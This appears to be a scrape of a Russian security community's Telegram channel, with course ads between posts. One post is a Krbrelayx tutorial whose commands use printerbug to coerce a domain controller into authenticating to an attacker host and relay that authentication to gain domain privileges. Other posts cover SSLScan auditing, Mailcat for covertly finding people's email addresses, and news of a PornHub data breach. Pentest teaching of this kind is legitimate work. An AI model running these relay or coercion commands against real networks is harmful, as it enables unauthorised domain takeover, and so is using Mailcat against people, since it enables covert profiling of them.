Codeby
36.4K subscribers
1.86K photos
93 videos
12 files
7.66K links
Блог сообщества Кодебай

Чат: @codeby_one
Форум: codeby.net
Обучение: codeby.school
Пентест: codeby.one
CTF: hackerlab.pro

VK: vk.com/codeby
YT: clck.ru/XG99c

Сотрудничество: @KinWiz

Реклама: @Savchenkova_Valentina
Download Telegram
Krbrelayx: Инструментарий для исследования и эксплуатации Kerberos в Active Directory

Krbrelayx — это набор инструментов на языке Python, разработанный для демонстрации и проверки уязвимостей, связанных с протоколом Kerberos и службой каталогов Active Directory. Основное внимание уделяется техникам спуфинга и ретрансляции, которые могут позволить злоумышленнику получить несанкционированный доступ или повысить привилегии в корпоративной среде.


🟧Набор Krbrelayx состоит из нескольких инструментов, каждый из которых нацелен на конкретные векторы атаки в инфраструктуре Active Directory:
- Основная функция набора — проведение атак, связанных с ретрансляцией запросов Kerberos, для несанкционированного доступа к сетевым ресурсам
- Инструменты позволяют создавать поддельные службы для перехвата и использования Kerberos-билетов, таких как TGS (Ticket Granting Service)
- Набор демонстрирует эксплуатацию особенностей протокола Kerberos, включая проблемы с проверкой подлинности и делегированием
- Поддержка различных методов указания целей, включая использование файлов и прямых аргументов командной строки

🟧Установка
sudo apt install krbrelayx

Проверяем
krbrelayx -h


🟧Переходим в директорию проекта и устанавливаем зависимости
cd krbrelayx
pip install -r requirements.txt


🟧Атака с использованием утилиты printerbug и ретрансляции
1. Запуск инструмента ретрансляции на машине атакующего
krbrelayx -t ldap://dc02.domain.local # Он будет ожидать входящих соединений Kerberos и ретранслировать их на целевой сервер (например, файловый ресурс)

2. На другой консоли выполняется скрипт printerbug, который принуждает контроллер домена (dc01)
printerbug domain.local/dc01\$@dc01.domain.local Attacker_IP # Аутентифицироваться на указанном IP атакующего (Attacker_IP) под учетной записью компьютера dc01$

В результате хэш пароля учетной записи компьютера dc01$ может быть ретранслирован на сервер dc02, что потенциально позволит создать нового пользователя в домене с высокими привилегиями.

🟧Базовая команда для запуска слушателя и ретрансляции на указанный контроллер домена
krbrelayx -t ldap://dc01.corp.local -wh wpad.corp.local -wa 2


🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
9👍6🔥5
🔔 Python стал универсальным инструментом, который снимает рутину с пентестера и ускоряет работу.
Посмотрим, как это происходит на практике. ⬆️


Готовы использовать Python, чтобы ваш пентест стал быстрее и глубже? Сделайте себе профессиональный подарок. Запись на курс «Python для Пентестера» открыта до 25 декабря.

🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

По всем вопросам пишите
⚡️ @Codeby_Academy
➡️ Все наши каналы 💬Все наши чаты
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
11👍8🔥5👎1😁1
SSLScan: Инструмент для аудита SSL/TLS конфигураций
SSLScan — это утилита командной строки, предназначенная для глубокого анализа конфигурации SSL/TLS на удаленных серверах. Его основная задача — проверка поддерживаемых протоколов, шифров и выявление устаревших или небезопасных настроек путем установки соединений с целевым хостом. В отличие от ручной проверки, SSLScan предоставляет структурированный и полный отчет о состоянии безопасности криптографических протоколов сервера.


💛Возможности
- Анализ всех поддерживаемых сервером шифров для различных версий протоколов (SSLv2, SSLv3, TLS 1.0-1.3)
- Четкое выявление, какие версии SSL и TLS (включая TLS 1.3) активированы на сервере
- Тестирование порядка предпочтения шифров со стороны сервера
- Получение детальной информации о цепочке сертификатов, включая алгоритмы подписи, срок действия, соответствие имени хоста (SNI) и использование расширений, таких как OCSP Must-Staple
- Проверка на наличие известных уязвимостей, включая Heartbleed (CVE-2014-0160), ROBOT, поддержку сжатия TLS (CRIME) и поддержку безопасного возобновления сессии (Secure Renegotiation)
- Возможность сканирования виртуальных хостов, использующих SNI
- Вывод в удобочитаемом виде или в формате XML/JSON для последующего анализа в автоматизированных системах

💛Установка
sudo apt install sslscan
Проверка
sslscan -h

💛Базовое сканирование хоста
sslscan example.com
Эта команда выполнит все основные проверки для домена example.com на стандартном порту 443

💛Сканирование с указанием порта
sslscan example.com:8443
Полезно для проверки нестандартных HTTPS-портов, часто используемых в API или внутренних сервисах

💛Проверка конкретной версии протокола (например, только TLS 1.2 и TLS 1.3)
sslscan --tls13 --tls12 example.com

💛Тестирование всех поддерживаемых шифров без проверки сертификата
sslscan --no-cipher-details --no-renegotiation --no-compression --no-fallback example.com
Опция --no-cipher-details ускоряет сканирование, пропуская детальный анализ каждого шифра

💛Сохранение отчета в формате XML
sslscan --xml=report.xml example.com

💛Недостатки
⁃ Однопоточная архитектура делает полное сканирование всех шифров крайне медленным
- Для полной функциональности требуется статическая сборка с отдельной версией OpenSSL, что увеличивает размер файла и усложняет поддержку
- Базовые форматы отчетов (XML/JSON) требуют дополнительной обработки; отсутствует API для автоматизации

🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
👍158🔥6
Mailcat

Mailcat - Найдите существующие адреса электронной почты по нику, используя методы проверки API/SMTP без уведомления пользователя.

📕Характеристики:
Удобный интерфейс
Поддержка tor
Поддержка proxy

💻Установка:
git clone https://github.com/sharsil/mailcat.git

cd mailcat

pip3 install -r requirements.txt --break-system-packages


📌Запуск:
python3 mailcat.py <NICKNAME>

Запуск с tor:
python3 mailcat.py --tor <NICKNAME>

Запуск с proxy:
proxychains4 -q python3 mailcat.py <NICKNAME> 

или
python3 mailcat.py <NICKNAME> --proxy https://127.0.0.1:8080


🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
👍125🔥5
🟠Цифровая интимность на витрине. Компрометация PornHub ⚫️

Хакерская группировка ShinyHunters заявила о компрометации данных ≈200 миллионов пользователей Pornhub, сообщает Reuters. Злоумышленники требуют выкуп в биткоинах, угрожая публикацией информации в открытом доступе.
ShinyHunters — одна из самых известных киберпреступных группировок, специализирующихся на кражах и продаже баз данных, вымогательстве и массовых утечках персональных данных. Активны как минимум с 2020 года и за это время стали синонимом крупных data breach-инцидентов. Деятельность данной группировки связывают с утечками данных: Tokopedia, Wattpad, Pixlr, Wishbone, Mathway, HomeChef.


Какие данные скомпрометированы
По подтверждённой информации, в утечке присутствуют:
🟠 email-адреса пользователей
🟠 история просмотров
🟠 поисковые запросы
🟠 ссылки и названия видео
🟠 метаданные пользовательской активности
Это не просто PII, а поведенческие данные, позволяющие точно восстановить цифровой профиль пользователя.

🔸Эксперты считают, что взлом мог произойти не через инфраструктуру Pornhub напрямую, а через сторонний аналитический сервис Mixpanel, с которым платформа сотрудничала до 2021 года.

🔸Pornhub сообщил о расследовании и рекомендовал пользователям сохранять бдительность.
Но в реальности этот инцидент — ещё одно напоминание:
если данные куда-то отправляются — значит, однажды они могут утечь

🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
😁9🍓5🍌32🔥2😱1🐳1👀1